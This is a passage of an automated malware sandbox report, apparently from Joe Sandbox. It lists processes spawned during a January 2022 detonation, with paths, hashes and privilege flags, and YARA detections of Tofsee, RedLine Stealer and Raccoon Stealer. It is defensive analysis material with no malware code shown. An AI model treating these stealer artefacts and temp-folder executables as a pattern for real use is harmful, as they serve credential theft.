                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:37
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:svchost.exe
                                                                                                                                                                                                        Imagebase:0xfc0000
                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:40
                                                                                                                                                                                                        Start date:14/01/2022
Path: C:\Users\user\AppData\Local\Temp\8EC4.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\8EC4.exe
Imagebase: 0x610000
File size: 537088 bytes
MD5 hash: D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 00:15:51
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\7801.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\7801.exe
Imagebase: 0x400000
File size: 905216 bytes
MD5 hash: 852D86F5BC34BF4AF7FA89C60569DF13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

Disassembly

Code Analysis